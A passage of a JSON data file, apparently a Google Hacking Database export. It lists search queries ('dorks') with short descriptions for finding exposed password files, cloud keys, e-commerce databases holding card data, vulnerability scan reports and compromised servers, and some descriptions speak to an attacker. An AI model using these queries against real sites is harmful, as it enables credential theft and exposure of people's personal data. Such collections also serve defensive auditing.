21/1/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"insert into users\" \"VALUES\" ext:sql | ext:txt | ext:log | ext:env", "description": "# Google Dork: \"insert into users\" \"VALUES\" ext:sql | ext:txt | ext:log | ext:env\r\n\r\n# Sensitive directories containing usernames, passwords and more...\r\n\r\n# Date: 21/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"cpanel username\" \"cpanel password\" ext:txt", "description": "Dork: \"cpanel username\" \"cpanel password\" ext:txt\r\nAuthor:"}, {"dork": "intitle:\"index of\" \"application-users.properties\" | \"mgmt-users.properties\" | \"*standalone.xml\"", "description": "# Google Dork: intitle:\"index of\" \"application-users.properties\" | \"mgmt-users.properties\" | \"*standalone.xml\"\r\n\r\n# Files containing usernames and passwords in some cases...\r\n\r\n# Date: 23/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"public $user =\" | \"public $password = \" | \"public $secret =\" | \"public $db =\" ext:txt | ext:log -git", "description": "# Google Dork: \"public $user =\" | \"public $password = \" | \"public $secret =\" | \"public $db =\" ext:txt | ext:log -git\r\n\r\n# Files containing usernames and passwords and more...\r\n\r\n# Date: 23/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)", "description": "#Dork: site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)"}, {"dork": "\"# -FrontPage-\" ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\" inurl:service.pwd", "description": "# Dork: \"# -FrontPage-\" ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\" inurl:service.pwd\r\n\r\nThankyou,\r\nParth Patel."}, {"dork": "inurl:/wp-content/uploads/ ext:txt \"username\" AND \"password\" | \"pwd\" | \"pw\"", "description": "# Dork: inurl:/wp-content/uploads/ ext:txt \"username\" AND \"password\" | \"pwd\" | \"pw\""}, {"dork": "allintext:\"*.@gmail.com\" OR \"password\" OR \"username\" filetype:xlsx", "description": "# DORK: allintext:\"*.@gmail.com\" OR \"password\" OR \"username\" filetype:xlsx"}, {"dork": "inurl:/wp-content/uploads/data.txt", "description": "# Google Dork: inurl:/wp-content/uploads/data.txt\r\n\r\n# Files Containing Passwords\r\n\r\n# Date: 22/07/2021\r\n\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "site:pastebin.com intitle:\"password\" 2021", "description": "# Google Dork: site:pastebin.com intitle:\"password\" 2021\r\n# Files Containing Passwords\r\n# Date: 24/08/2021 \r\n# Exploit Author: Deepak Kumar"}, {"dork": "filetype:log username admin", "description": "# Google Dork: filetype:log username admin\r\n# Files Containing Passwords\r\n# Date: 09/009/2021 \r\n# Exploit Author: Rohit Singh"}, {"dork": "\"enable secret 5\" ext:txt | ext:cfg", "description": "# Google Dork: \"enable secret 5\" ext:txt | ext:cfg\r\n# Files Containing Passwords.\r\n# Date: 8/08/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:wp-config.php.save", "description": "# Google Dork: inurl:wp-config.php.save\r\n# Files Containing Passwords\r\n# Date: 02/08/2021 \r\n# Exploit Author: Mohsin Khan"}, {"dork": "Inurl: \"login\" Intitle:index of username and pass", "description": "# Google Dork: Inurl: \"login\" Intitle:index of username and pass\r\n# Files Containing Passwords\r\n# Date: 22/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "intitle: \"Index of ftp passwords\"", "description": "# Google Dork: intitle: \"Index of ftp passwords\"\r\n# Files Containing Passwords\r\n# Date:12/09/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "\"index of /\" +passwd", "description": "# Google Dork: \"index of /\" +passwd\r\n# Files Containing Passwords\r\n# Date:24/09/2021\r\n# Exploit Author: Sugavanam D"}, {"dork": "allintext:password filetype:log after:2018", "description": "# Google Dork: allintext:password filetype:log after:2018\r\n# Files Containing Passwords\r\n# Date:26/09/2021\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "intitle:\"index of\" \"credentials\"", "description": "# Google Dork: intitle:\"index of\" \"credentials\"\r\n# Files Containing Passwords\r\n# Date:12/10/2021\r\n# Exploit Author: Darkgen"}, {"dork": "intitle:\"index of\" \"passwrod*\"", "description": "# Google Dork: intitle:\"index of\" \"password*\"\r\n# Files Containing Passwords\r\n# Date:22/10/2021\r\n# Exploit Author: Roshdy Essam"}, {"dork": "inurl:password site:shodan.io", "description": "# Google Dork: inurl:password site:shodan.io\r\n# Files Containing Passwords\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "site:pastebin.com intext:username | password | SECRET_KEY", "description": "# Google Dork: site:pastebin.com intext:username | password | SECRET_KEY\r\n# Files Containing Passwords\r\n# Date:29/10/2021\r\n# Exploit Author: Jorge Manuel Lozano G\u00f3mez"}, {"dork": "inurl:/wp-content/uploads/ ext:txt \"username\" | \"user name\" | \"uname\" | \"user\" | \"userid\" | \"user id\" AND \"password\" | \"pass word\" | \"pwd\" | \"pw\"", "description": "# Google Dork: inurl:/wp-content/uploads/ ext:txt \"username\" | \u201cuser name\u201d | \u201cuname\u201d | \u201cuser\u201d | \u201cuserid\u201d | \u201cuser id\u201d AND \"password\" | \u201cpass word\u201d | \"pwd\" | \"pw\"\r\n# Files Containing Passwords\r\n# Date:29/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intext:\"/pfx-password.txt\" \"[To Parent Directory]\"", "description": "# Google Dork: intext:\"/pfx-password.txt\" \"[To Parent Directory]\"\r\n# Files Containing Passwords\r\n# Date:31/10/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intext:\"index of\" \"uploads\"", "description": "# Google Dork: intext:\"index of\" \"uploads\"\r\n# Files containing juicy information\r\n# Date: 05/11/2021\r\n# Author: Onkar Deshmukh"}, {"dork": "intext:\"password\" | \"passwd\" | \"pwd\" site:ghostbin.com", "description": "# Google Dork: intext:\"password\" | \"passwd\" | \"pwd\" site:ghostbin.com\r\n# Files Containing Passwords\r\n# Date:5/11/2021\r\n# Exploit Author: Nisrin Ahmed"}, {"dork": "site:pastebin.com intext:password.txt", "description": "# Google Dork: site:pastebin.com intext:password.txt\r\n# Files Containing Passwords\r\n# Date:5/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intext:\"Index of\" intext:\"password.zip\"", "description": "# Google Dork: intext:\"Index of\" intext:\"password.zip\"\r\n# Files Containing Passwords\r\n# Date:8/11/2021\r\n# Exploit Author: Parshwa Bhavsar"}, {"dork": "site:pastebin.com intext:pass.txt", "description": "# Google Dork: site:pastebin.com intext:pass.txt\r\n# Files Containing Passwords\r\n# Date: 08/11/2021 \r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:pastebin.com \"password\"", "description": "# Google Dork: site:pastebin.com \"password\"\r\n# Files Containing Passwords\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:pastebin.com \"admin password\"", "description": "# Google Dork: site:pastebin.com \"admin password\"\r\n# Files Containing Passwords\r\n# Date:15/11/2021\r\n# Exploit Author: Saumyajeet Das"}, {"dork": "site:controlc.com intext:\"password\"", "description": "# Google Dork: site:controlc.com intext:\"password\"\r\n# Files Containing Passwords\r\n# Date:15/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:rentry.co intext:\"password\"", "description": "# Google Dork: site:rentry.co intext:\"password\"\r\n# Files Containing Passwords\r\n# Date:15/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "intitle:\"Index of\" htpasswd", "description": "# Google Dork: intitle:\"Index of\u201d htpasswd\r\n# Files Containing Passwords\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"Index of\" pwd.db", "description": "# Google Dork: intitle:\"Index of\u201d pwd.db\r\n# Files Containing Passwords\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:index of /etc/ssh", "description": "# Google Dork: intitle:index of /etc/ssh\r\n# Files Containing Juicy Info\r\n# Date: 25/04/2024\r\n# Exploit: Shivam Dhingra"}, {"dork": "intext:\"aws_access_key_id\" | intext:\"aws_secret_access_key\" filetype:json | filetype:yaml", "description": "Dork For : Finding exposed cloud service credentials\r\n\r\nRegards,\r\nJoel Indra"}], "Sensitive Online Shopping Info": [{"dork": "site:ups.com intitle:\"Ups Package tracking\" intext:\"1Z ### ### ## #### ### #\"", "description": "Ever use the UPS Automated Tracking Service?? Wanna see where packages are going? Want to Man-in-the-middle their delivery? Well, then here it is.-Digital Spirit"}, {"dork": "intext:\"powered by Hosting Controller\" intitle:Hosting.Controller", "description": "Description:==============Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. It is the only multilingual software package you need to put your Web hosting business on autopilot.The HC has its own complete billing solution which is tightly integrated within Control Panel & does all the invoicing & billing.Vuln:======A remote authenticated user can invoke 'resellerdefaults.asp' to view reseller add-on plans and then load the following type of URL to view the details of a target reseller's plans:The 'resellerresources.asp' script does not properly validate user-supplied input in the 'resourceid' parameter. A remote authenticated user can supply specially crafted parameter values to execute SQL commands on the underlying database. This can be exploited, for example, to delete a reseller add-on plan.More on Vuln/Exploit====================http://securitytracker.com/alerts/2005/May/1014071.html"}, {"dork": "intext:\"Dumping data for table `orders`\"", "description": "Dork finds SQL dump files containing personal information\nBy warlock72"}, {"dork": "POWERED BY HIT JAMMER 1.0!", "description": "Hit Jammer is a Unix compatible script that allows you to manage the content and traffic exchange and make web changes, all without needing HTML. It is typicaly used by the underground sites on the Net who \"pay for surfing ads\" and advertise spam services or software.An attacker can find these sites by searching for the typical \"powered by hit jammer !\" frase on the bottom of the main page. Then if he changes the URL to www.target.com/admin/admin.php he is taken to the admin panel. Hit Jammer administrators are warned to protect this page with the .htaccess logon procedure, but many fail to do just that. In such cases, customer information like email addresses and passwords are in clear view of the attacker. Since human beings often use one simple password for many things this is a very dangerous practice."}, {"dork": "inurl:\"shopadmin.asp\" \"Shop Administrators only\"", "description": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.It has been reported that the Shopping Cart Administration script is vulnerable to XSS and SQJ injection, resulting in exposure of confidential customer information like credit card details. More information on this attack is available at http://securitytracker.com/alerts/2002/May/1004384.html"}, {"dork": "inurl:\"/database/comersus.mdb\"", "description": "Comersus is an e-commerce system and has been installed all over the world in more than 20000 sites. Using Comersus does not require that you know any programming language. BackOffice+ allows you to define virtually all properties of your on-line store through an intuitive, point-&-click interface.This search goes directly for one of the MS Access files used by the shopping cart. Searching Google and the well know security sites for Comersus reveals more security problems."}, {"dork": "inurl:shopdbtest.asp", "description": "shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script allows remote attackers toview the database location, and since that is usually unprotected, the attacker can then download the web site's database by simly clicking on a URL (that displays the active database). The page shopdbtest.asp is visible to all the users and contains the full configuration information. An attacker ca therefore download the MDB (Microsoft Database file), and gain access to sensitive information about orders, users, password, ect."}, {"dork": "\"More Info about MetaCart Free\"", "description": "MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability in the free demo version of the product (MetaCartFree) allows attackers to access the database used for storing user provided data (Credit cart numbers, Names, Surnames, Addresses, E-mails, etc)."}, {"dork": "inurl:midicart.mdb", "description": "MIDICART is s an ASP and PHP based shopping Cart application with MS Access and SQL database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, phone number, credit card number, and company name)."}, {"dork": "intext:\"Powered by X-Cart: shopping cart software\" -site:x-cart.com", "description": "X-Cart (version 4.0.8) has multiple input validation vulnerabilities. There doesn't seem to be any way to search for specific versions of the software with Google. See http://www.securitytracker.com/alerts/2005/May/1014077.html for more information."}, {"dork": "dcid= bn= pin code=", "description": "Information disclosure of reservation information,which can leak to many other leaks.\nAll related to t Booking.com client who decided to save theirs trip data online,sometime near personal information like passport \nBy popshark1"}, {"dork": "intext:\" Design & Developed by Antique Touch - INDIA\"", "description": "# Google Dork: intext:\" Design & Developed by Antique Touch - INDIA\"\r\n# Sensitive Online Shopping Info\r\n# Date: 20/07/2021 \r\n# Exploit Author: Cliffe Zeding"}, {"dork": "inurl:/commodities.php?id=", "description": "# Google Dork: inurl:/commodities.php?id=\r\n# Sensitive Online Shopping Info\r\n# Date: 08/11/2021 \r\n# Exploit Author: Harshit Koli"}, {"dork": "inurl:product-list.php?id=", "description": "# Google Dork: inurl:product-list.php?id=\r\n# Sensitive Online Shopping Info\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:mail.* intitle:Dashboard", "description": "# Google Dork: site:mail.* intitle:Dashboard\r\n# Sensitive Online Shopping Info\r\n# Date: 12/11/2021 \r\n# Exploit Author: Soriful Islam Shoaib"}], "Network or Vulnerability Data": [{"dork": "inurl:/cgi-bin/finger? Enter (account|host|user|username)", "description": "The finger command on unix displays information about the system users. This search displays the webinterface for that command."}, {"dork": "inurl:portscan.php \"from Port\"|\"Port Range\"", "description": "This is general search for online port scanners which accept any IP. It does not find a specific scanner script, but searches for a pattern which will match some more scanners."}, {"dork": "intitle:\"sysinfo * \" intext:\"Generated by Sysinfo * written by The Gamblers.\"", "description": "Lots of information leakage on these pages about active network services, server info, network connections, etc.."}, {"dork": "\"Phorum Admin\" \"Database Connection\" inurl:forum inurl:admin", "description": "Phorum admin pagesThis either shows Information leakage (path info) or it shows Unprotected Admin pages."}, {"dork": "inurl:\"sitescope.html\" intitle:\"sitescope\" intext:\"refresh\" -demo", "description": "Mercury SiteScope designed to ensure the availability and performance of distributed IT infrastructures \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009d e.g., servers, operating systems, network devices, network services, applications, and components. Some pages may be IP restricted."}, {"dork": "filetype:php inurl:ipinfo.php \"Distributed Intrusion Detection System\"", "description": "Dshield is a distributed intrusion detection system. The ipinfo.php script includes a whois lookup form."}, {"dork": "intext:\"Welcome to the Web V.Networks\" intitle:\"V.Networks [Top]\" -filetype:htm", "description": "see and control JVC webcameras, you can move the camera, zoom... change the settings, etc...."}, {"dork": "\"Traffic Analysis for\" \"RMON Port * on unit *\"", "description": "List of RMON ports produced by MRTG which is a network traffic analysis tool. See also #198"}, {"dork": "intitle:\"Belarc Advisor Current Profile\" intext:\"Click here for Belarc's PC Management products, for large and small companies.\"", "description": "People who have foolishly published an audit of their machine(s) on the net with some server info as well"}, {"dork": "inurl:login.jsp.bak", "description": "JSP programmer anyone? You can read this!"}, {"dork": "inurl:ovcgi/jovw", "description": "An HP Java network management tool. It is a sign that a network may not be configured properly."}, {"dork": "inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl", "description": "Information about proxy servers, internal ip addresses and other network sensitive stuff."}, {"dork": "inurl:CrazyWWWBoard.cgi intext:\"detailed debugging information\"", "description": "gives tons of private forum configuration information.examples: Global variables installed, what groups the default user, guest and admin belong to, file paths, OS and appache versions, encypted admin password.Also Crazyboard has known vulnerabilities."}, {"dork": "\"The statistics were last updated\" \"Daily\"-microsoft.com", "description": "Results include many varius Network activity logs"}, {"dork": "inurl:finger.cgi", "description": "Finger\nSubmitted by: Christy Philip Mathew"}, {"dork": "inurl:\"/munin/network-*.html\" OR inurl:\"/munin/apache-*.html\" OR inurl:\"/munin/disk-*.html\" OR inurl:\"/munin/system-*.html\" OR inurl:\"/munin/munin-*.html\" OR inurl:\"/munin/problems.html\"", "description": "Search the Munin monitoring graphs\nDaniel Maldonado\nhttp://caceriadespammers.blogspot.com.ar"}, {"dork": "intitle:\"bandwidthd\" \"programmed by david hinkle, commissioned by derbytech wireless networking.\"", "description": "BandwidthD Search Report.\nIng. Daniel Maldonadohttp://www.caceriadespammers.com.ar"}, {"dork": "intext:\"Web Application Report\" intext:\"This report was created by IBM Security AppScan\" ext:pdf", "description": "To search IBM AppScan vulnerability Report.\nFrom Huhai-chiang"}, {"dork": "(inurl:\"8080/monitorix\" & intext:\"Hostname\") | inurl:\"8080/monitorix-cgi\"", "description": "Monitorix - system monitoring tool web interface,\nby neon"}, {"dork": "\"generated by Munin\" inurl:index -intext:index localhost", "description": "Panels of Munin networks.\nEnjoy.\nDork by Rootkit Pentester."}, {"dork": "inurl:zabbix.php AND intext:\"Zabbix SIA\"", "description": "Dork for ZABBIX Network Monitoring System (version 3.2.x)\n--\n@verovan"}, {"dork": "inurl:\"NmConsole/Login.asp\" | intitle:\"Login - Ipswitch WhatsUp Professional 2005\" | intext:\"Ipswitch WhatsUp Professional 2005 (SP1)\" \"Ipswitch, Inc\"", "description": "Ipswitch Whats Up Monitoring 2005!This is a console for Network Monitoring, access beyond the portal will allow you to do various things, such as telnet to internal machines, reboot servers, gain server information such as IP address.If the Administrators have utilised WUG to its potential, they will have also made full Infrastructure MAPs available. Access beyond the portal is Gold Information, you would have access to information and services as if you were an Administrator.In addition, some of the links, allow you to go beyond the portal as a guest user, this still allows reconisance of various servers and details of them, including where they are located physically.For anybody that is interested, the Login Portal has a SQL based Backend."}, {"dork": "inurl:\"/cacti/graph_view.php\" OR inurl:\"/cacti/graph.php?\"", "description": "Search the CACTI system of SNMP graphs\nDaniel Maldonado\nhttp://caceriadespammers.com.ar"}, {"dork": "intitle:\"Nessus Scan Report\" \"This file was generated by Nessus\"", "description": "This search yeids nessus scan reports. Even if some of the vulnerabilities have been fixed, we can still gather valuable information about the network/hosts. This also works with ISS and any other vulnerability scanner which produces reports in html or text format."}, {"dork": "\"This report lists\" \"identified by Internet Scanner\"", "description": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."}, {"dork": "\"Network Host Assessment Report\" \"Internet Scanner\"", "description": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."}, {"dork": "\"SnortSnarf alert page\"", "description": "snort is an intrusion detection system. SnorfSnarf creates pretty web pages from intrusion detection data. These pages show what the bad guys are doing to a system. Generally, it's a bad idea to show the bad guys what you've noticed."}, {"dork": "inurl:phpSysInfo/ \"created by phpsysinfo\"", "description": "This statistics program allows the an admin to view stats about a webserver. Some sites leave this in a publically accessible web page. Hackers could have access to data such as the real IP address of the server, server memory usage, general system info such as OS, type of chip, hard-drive makers and much more."}, {"dork": "filetype:pdf \"Assessment Report\" nessus", "description": "These are reports from the Nessus Vulnerability Scanner. These report contain detailed information about the vulnerabilities of hosts on a network, a veritable roadmap for attackers to folow."}, {"dork": "filetype:vsd vsd network -samples -examples", "description": "Reveals network maps (or any other kind you seek) that can provide sensitive information such as internal IPs, protocols, layout, firewall locations and types, etc. Attackers can use these files in an information gathering campaign."}, {"dork": "intitle:\"ADSL Configuration page\"", "description": "This is the status screen for the Solwise ADSL modem. Information available from this page includes IP addresses, MAC addresses, subnet mask, firware version of the modem. Attackers can use this information to formulate an attack."}, {"dork": "\"Version Info\" \"Boot Version\" \"Internet Settings\"", "description": "This is the status page for a Belkin Cable/DSL gateway. Information can be retrieved from this page including IP addresses, WAN addresses, MAC addresses, firmware versions, serial numbers, subnet masks, firewall settings, encryption settings, NAT settings and SSID. Attackers can use this information to formulate an attack."}, {"dork": "\"Looking Glass\" (inurl:\"lg/\" | inurl:lookingglass)", "description": "A Looking Glass is a CGI script for viewing results of simple queries executed on remote routers. There are many Looking Glass sites all over the world. Some are password protected, many are not.An attacker use this to gather information about the network."}, {"dork": "ACID \"by Roman Danyliw\" filetype:php", "description": "ACID stands for for \"Analysis Console for Incident Databases\". It is a php frontend for the snort intrusion detection system database.These pages can be used by attackers to view network attacks that have occurred against the target. Using this information, an attacker can craft an attack and glean network information including vulnerabilities, open ports, ip addresses, network layout, existance of firewall and IDS systems, and more."}, {"dork": "intitle:\"Microsoft Site Server Analysis\"", "description": "Microsoft discontinued Site Server and Site Server Commerce Edition on June 1, 2001 with the increasing adoption of its successor, Microsoft Commerce Server 2000 Server and Microsoft Commerce Server 2002. There are still some installations online however. An attacker may use these reports to gather information about the directory structure and possibly identify script files."}, {"dork": "\"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\"", "description": "dork: \"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\" this is for PHP Web Statistik script, you can go to: http://[target]/[path_to]/log/logdb.dta to see clear text logs"}, {"dork": "\"apricot - admin\" 00h", "description": "This search shows the webserver access stats as the user \"admin\". The language used is Japanese and the search includes the \"00h\" value which is only shown when the admin is logged in."}, {"dork": "\"this proxy is working fine!\" \"enter *\" \"URL***\" * visit", "description": "These are test pages for some proxy program. Some have a text field that allows you to use that page as a proxy. The experts comment on this is there are much better solutions for surfing anonymously."}, {"dork": "site:netcraft.com intitle:That.Site.Running Apache", "description": "Netcraft reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site. So, Netcraft scans Web servers, Google scans Netcraft, and the hacker scans Google.This search is easily modified (replace \"apache\" for the other server software), thus adding yet another way to find the webserver software version info."}, {"dork": "\"Powered by phpOpenTracker\" Statistics", "description": "phpOpenTracker is a framework solution for the analysis of website traffic and visitor analysis. More info at the vendor site: http://www.phpopentracker.de/en/index.phpA prebuild sample report is shipped with PhpOpenTracker which is used by most sites. This report does not use all possibilities of the framework like user tracking."}, {"dork": "inurl:\"/catalog.nsf\" intitle:catalog", "description": "This will return servers which are running versions of Lotus Domino. The catalog.nsf is the servers DB catalog. It will list all the DB's on the server and sometimes some juicy info too. An attacker can back the url down to the \"/catalog.nsf\" part if needed."}, {"dork": "((inurl:ifgraph \"Page generated at\") OR (\"This page was built using ifgraph\"))", "description": "ifGraph is a set of perl scripts that were created to fetch data from SNMP agents and feed a RRD file (Round Robin Database) so that graphics can be created later. The graphics and the databases are created using a tool called RRDTool."}, {"dork": "ext:cgi intext:\"nrg-\" \" This web page was created on \"", "description": "NRG is a system for maintaining and visualizing network data and other resource utilization data. It automates the maintenance of RRDtool databases and graph web pages (that look like MRTG web pages.)"}, {"dork": "inurl:\"map.asp?\" intitle:\"WhatsUp Gold\"", "description": "\"WhatsUp Gold's new SNMP Viewer tool enables Area-Wide to easily track variables associated with any port on a network device. With a few simple clicks, a network engineer can select device ports, navigate trees, and graph variables in real time. For instance, Area-Wide can track bandwidth or CPU utilization on a router to aid in capacity and resource management.\""}, {"dork": "filetype:php inurl:nqt intext:\"Network Query Tool\"", "description": "Network Query Tool enables any Internet user to scan network information using:* Resolve/Reverse Lookup* Get DNS Records* Whois (Web)* Whois (IP owner)* Check port (!!!)* Ping host* Traceroute to host* Do it allThe author has been informed that the nqt form also accepts input from cross site pages, but he will not fix it.A smart programmer could use the port scan feature and probe al the nmap services ports. Though this would be slow, but it provides a higher degree of anonymity, especially if the attacker is using a proxy or an Internet Cafe host to access the NQT pages.It gets even worse .. an attacker can scan the *internal* hosts of the networks that host NQT in many cases. Very dangerous.PS: this vulnerability was found early this year (search google for the full report), but was never added to the GHDB for some reason."}, {"dork": "inurl:/cgi-bin/finger? \"In real life\"", "description": "The finger command on unix displays information about the system users. This search displays pre-fingered users, so an attacker wouldn't even have to guess their accounts."}, {"dork": "inurl:statrep.nsf -gov", "description": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds statistics pages generated by Domino. Information on these pages includes Operating System, Disk space, Usernames and full path disclosure.Example: * 1. Statistics Reports - 1. System * 1. Statistics Reports - 2. Mail & Database * 1. Statistics Reports - 3. Communications * 1. Statistics Reports - 4. Network * 1. Statistics Reports - 5. Clusters * 1. Statistics Reports - 6. Web Server & Retriever * 1. Statistics Reports - 7. Calendaring Scheduling * 2. Alarms * 3. Events * 4. Spreadsheet Export * 5. Graphs - 1. System Statistics * 5. Graphs - 2. System Loads * 5. Graphs - 3. System Resources * 6. Trouble Tickets - 1. Alarm * 6. Trouble Tickets - 2. Event * 7. Analysis Report * 8. File Statistics * 9. Single Copy Object Store Statistics"}, {"dork": "inurl:webutil.pl", "description": "webutil.pl is a web interface to the following services:* ping* traceroute* whois* finger* nslookup* host* dnsquery* dig* calendar* uptime"}, {"dork": "inurl:/adm-cfgedit.php", "description": "PhotoPost Pro is photo gallery system. This dork finds its installation page.You can use this page to set all parameters of the system. The existing data is not shown :("}, {"dork": "filetype:log intext:\"ConnectionManager2\"", "description": "ISDNPM 3.x for OS/2-Dialer log files.These files contain sensitive info like ip addresses, phone numbers of dial in servers, usernames and password hashes - Everything you need to dial in...."}, {"dork": "inurl:testcgi xitami", "description": "Testpage / webserver environmentThis is the test cgi for xitami webserver. It shows the webserver's complete environment. Contains very interesting information which can be used a first step into the server."}, {"dork": "\"Output produced by SysWatch *\"", "description": "sysWatch is a CGI to display current information about your UNIX system. It can display drive partitions, disk or drive usage, as well as resource hogs (running processes) and last but not lease it shows what current users are doing online (including sh scripts etc..)."}, {"dork": "intitle:\"twiki\" inurl:\"TWikiUsers\"", "description": "TWiki has many security problems, depeding on the version installed. TWiki, is a flexible, powerful, and easy to use enterprise collaboration platform. It is a structured Wiki, typically used to run a project development space, a document management system, a knowledge base, or any other groupware tool, on an intranet or on the internet. Web content can be created collaboratively by using just a browser. Developers can create new web applications based on a Plugin API."}, {"dork": "ext:cfg radius.cfg", "description": "\"Radiator is a highly configurable and flexible Radius server that supports authentication by nearly 60 different types of authentication methods\"This search finds configuration files for this server, revealing its behaviour, methods for authenticating users, etc."}, {"dork": "intitle:\"start.managing.the.device\" remote pbx acc", "description": "MCK Communications, Inc.PBXgatewayIIHigh density central site gateway for remote PBX access(MCK Communications is now known as VESO.)"}, {"dork": "inurl:\"install/install.php\"", "description": "This searches for the install.php file. Most results will be a Bulletin board like Phpbb etc.This will let an attacker install the forum again. There is an exploit available on the Net which lets you see DB info."}, {"dork": "intitle:\"Azureus : Java BitTorrent Client Tracker\"", "description": "This query shows machines using the Azureus BitTorrent client's built-in tracker - the pages are quite simple in the information they give out, simply a list of active torrents.This information may be useful for people wanting to find active BitTorrent trackers for downloading .torrent files from, or for people wanting to find these trackers to shut them down :)"}, {"dork": "intitle:\"BNBT Tracker Info\"", "description": "This query shows pages which summarise activity on BNBT-powered BitTorrent trackers - including all the torrents currently being \"tracked\", the BNBT software version, links to user-lists and 'admin' pages, etc.This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. Some versions of BNBT are also vulnerable to a DOS attack. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!"}, {"dork": "intitle:\"PHPBTTracker Statistics\" | intitle:\"PHPBT Tracker Statistics\"", "description": "This query shows pages which summarise activity on PHPBT-powered BitTorrent trackers - all the torrents currently being \"tracked\".This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!Often, the URL involved can be changed to access the configuration / installation / deletion script.. which are obviously *not* intended for public access, even if the statistics page is."}, {"dork": "\"powered | performed by Beyond Security's Automated Scanning\" -kazaa -example", "description": "This search finds Beyond Security reports. Beyond Security sells a box which performs automated testing (the product is based on Nessus). The Beyond Security report will help an attacker find vulnerabile services at the attackees site.This dork was found by Jamuse. A cleanup was done by Wolveso. Please note: Both current (feb 2005) results are verifiable as samples - they're linked from pages on the sites they belong to, as sample reports. But you never know when Google might find some real one's to play with ?!"}, {"dork": "inurl:status.cgi?host=all", "description": "Nagios Status page. See what ports are being monitored as well as ip addresses.Be sure to check the google cached page first."}, {"dork": "\"The following report contains confidential information\" vulnerability -search", "description": "This googledork reveals vunerability reports from many different vendors. These reports can contain information which can help an attacker break into a system/network."}, {"dork": "\"Shadow Security Scanner performed a vulnerability assessment\"", "description": "This is a googledork to find vulnerability reports produced by Shadow Security Scanner. They contain valuable information which can be used to break into a system."}, {"dork": "intitle:\"Retina Report\" \"CONFIDENTIAL INFORMATION\"", "description": "This googledork finds vulnerability reports produced by eEye Retina Security Scanner. The information inside these reports can help an attacker break into a system/network."}, {"dork": "inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin", "description": "***WARNING: This search uses google images, disable images unless you want your IP spewed across webpages!***Webalizer is a program that organizes who is going to a Webpage, what they are looking at, what user names are entered and endless other statistics.This is a great first step in getting too much information about a website. You see any links or files that are hidden, the search can be made more specific by using other google advanced searchs.Learn more about Webalizer(http://www.mrunix.net/webalizer/)."}, {"dork": "inurl:/counter/index.php intitle:\"+PHPCounter 7.*\"", "description": "This is an online vulnerable web stat program called PHPCounter 7.http://www.clydebelt.org.uk/counter/help.html It has several public vulnerabilities in versions 7.1 and 7.2 that include cross site scripting and unauthorized information disclosure."}, {"dork": "intitle:r57shell +uname -bbpress", "description": "compromised servers... a lot are dead links, but pages cached show interesting info, this is r57shell.php script by Rush Security Team"}, {"dork": "site*.*.*/webalizer intitle:\"Usage Statistics\"", "description": "Shows usage statistics of sites. Includes monthy reports on the IP addresses, user agents, and more, of the viewers of the sites, the most active first."}, {"dork": "\"Web Application Assessment Report\" ext:pdf", "description": "To search HP WebInspect Scan Report. The dorks is searching report that\nscanned before 2016. After 2016, the service of web inspect migrated to HP\nEnterprise.\nFrom Huhai-chiang"}, {"dork": "inurl:\"/weathermap/weathermap-cacti-plugin.php\"", "description": "Map IT infrastructure through Weathermap Cacti plugin\nIng. Daniel 